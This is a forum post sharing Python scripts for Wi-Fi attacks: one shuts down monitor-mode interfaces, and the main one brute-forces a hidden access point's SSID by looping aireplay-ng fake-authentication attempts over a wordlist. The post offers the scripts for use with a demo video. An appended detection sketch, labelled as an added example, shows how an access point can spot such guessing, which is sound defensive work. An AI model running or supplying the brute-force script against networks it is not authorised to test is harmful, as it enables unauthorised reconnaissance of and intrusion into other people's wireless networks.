
Thread: Useful python scripts - Brute hidden SSID


    I only wrote one of these scripts but did add airmon-ng support to the one I didn't.

    The hidden SSID brute force attack is demonstrated in the video below as part of a broader framework.

    Skip ahead to 2:44 for the hidden SSID demo.
    Sorry there is no awesome music to jam out to.
    http://vimeo.com/31786626 Comments on video will be appreciated

    The script parts (not the framework) are below... (I just started messing around with Python so this is an experiment)

    Might be useful to someone
    Kill all monitor interfaces
    Code:
    #!/usr/bin/python
    
    import subprocess
    
    # monitor-mode interface names to look for
    MONITOR_IFACES = ('mon0', 'mon1', 'mon2', 'mon3', 'mon4', 'ath0', 'ath1')
    
    # read the file /proc/net/dev
    f = open('/proc/net/dev', 'r')
    
    # write to list
    ifacelist = f.read().split('\n')
    
    # close the file
    f.close()
    
    # remove first 2 lines (column headers)
    ifacelist.pop(0)
    ifacelist.pop(0)
    
    for line in ifacelist:
    
        # each line is "<iface>: <rx/tx counters...>"
        ifacedata = line.split(':')
    
        # narrow down selection
        if len(ifacedata) == 2:
    
            iface = ifacedata[0].strip()
            counters = ifacedata[1].split()
    
            # verify interface is up (any traffic counter is non-zero)
            if any(int(c) > 0 for c in counters):
    
                # find iface
                if iface in MONITOR_IFACES:
                    print('\nmonitor interface found - Putting it down')
                    # stop the interface by name only; the counters are not an argument
                    subprocess.call(["airmon-ng", "stop", iface])
    
    brute hidden ssid script
    Code:
    #!/usr/bin/python
    
    
    # script created by Tony 'albatr0ss' Di Bernardo, October 2011
    # you are free to re-use the code as long as you give credit to the author in your works
    
    import subprocess
    import sys, re
    from subprocess import Popen, PIPE
    
    class bcolors:
        HEADER = '\033[95m'
        OKBLUE = '\033[94m'
        OKGREEN = '\033[92m'
        WARNING = '\033[93m'
        FAIL = '\033[91m'
        ENDC = '\033[0m'
    
        def disable(self):
            self.HEADER = ''
            self.OKBLUE = ''
            self.OKGREEN = ''
            self.WARNING = ''
            self.FAIL = ''
            self.ENDC = ''
    
    # all four arguments are required (argv[1] to argv[4] are read below)
    if (len(sys.argv) < 5):
        print('Usage: ' + sys.argv[0] + ' bssid essid_list channel interface')
        sys.exit(-1)
    
    bssid = sys.argv[1]
    essid_list = sys.argv[2]
    channel = sys.argv[3]
    interface = sys.argv[4]
    
    # put the interface into monitor mode on the given channel
    subprocess.call(["airmon-ng", "start", interface, channel])
    
    print('Searching name for Access Point ' + bssid + ' using file ' + essid_list)
    
    f = open(essid_list, 'r')
    
    for temp in f:
        # strip the newline and any non-word characters from the candidate name
        essid = re.sub(r'\W+', '', temp)
        print('Trying Essid: ' + essid)
        # universal_newlines=True returns text rather than bytes
        c = Popen(['aireplay-ng', '--fakeauth', '0', '-T', '1', '-a', bssid, '-e', essid, 'mon0'],
                  stdout=PIPE, universal_newlines=True)
        output = c.stdout.read()
    
        # the result is expected on the 7th output line; guard against shorter output
        lines = output.split('\n')
        finalresult = lines[6] if len(lines) > 6 else ''
    
        if finalresult.find('Association successful') != -1:
            print(bcolors.WARNING + '\nFound! Access Point ' + bssid + ' Essid is ' + essid + bcolors.ENDC)
            f.close()
            subprocess.call(["airmon-ng", "stop", "mon0"])
            sys.exit(0)
    
    f.close()
    print(bcolors.FAIL + '\nEssid not in file ' + essid_list + ' for Access Point ' + bssid + bcolors.ENDC)
    Last edited by Scamentology; 11-09-2011 at 08:25 AM.
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein
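
Seen from the access point's side, each guess in the script above is one association attempt carrying a candidate ESSID, so a run shows up as one client trying many different names against a single BSSID in a short time. The following detection sketch is an added example, not part of the original post; the record layout, the function name `find_ssid_guessing` and the thresholds are assumptions, and the sample events are constructed.

```python
from collections import defaultdict, deque

# Constructed sample records (not captured traffic), assumed to be parsed from
# AP or wireless-IDS logs: (time_s, client_mac, bssid, essid_tried, success)
SAMPLE_EVENTS = [
    (1.0,  "02:00:00:00:00:bb", "02:00:00:00:00:01", "corp-wifi", False),
    (2.0,  "02:00:00:00:00:bb", "02:00:00:00:00:01", "corp-wifi", True),
    (5.0,  "02:00:00:00:00:cc", "02:00:00:00:00:02", "cafe",      True),
    (10.0, "02:00:00:00:00:aa", "02:00:00:00:00:01", "linksys",   False),
    (11.0, "02:00:00:00:00:aa", "02:00:00:00:00:01", "default",   False),
    (12.0, "02:00:00:00:00:aa", "02:00:00:00:00:01", "netgear",   False),
    (13.0, "02:00:00:00:00:aa", "02:00:00:00:00:01", "dlink",     False),
    (14.0, "02:00:00:00:00:aa", "02:00:00:00:00:01", "corp-wifi", True),
]

def find_ssid_guessing(events, min_distinct=4, window_s=30.0):
    """Flag clients that try at least min_distinct different ESSIDs
    against one BSSID within a sliding window of window_s seconds."""
    recent = defaultdict(deque)   # (client, bssid) -> deque of (time, essid)
    alerts = {}
    for t, client, bssid, essid, ok in sorted(events):
        key = (client, bssid)
        q = recent[key]
        q.append((t, essid))
        # drop attempts that have fallen out of the time window
        while q and t - q[0][0] > window_s:
            q.popleft()
        distinct = {name for _, name in q}
        if len(distinct) >= min_distinct:
            a = alerts.setdefault(key, {"client": client, "bssid": bssid,
                                        "essids": set(), "first_seen": q[0][0],
                                        "hit": None})
            a["essids"] |= distinct
        # a success after the alert means the hidden name was recovered
        if ok and key in alerts:
            alerts[key]["hit"] = essid
    return list(alerts.values())
```

A client that retries its one configured ESSID never reaches the distinct-name threshold, so ordinary reconnects are not flagged.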
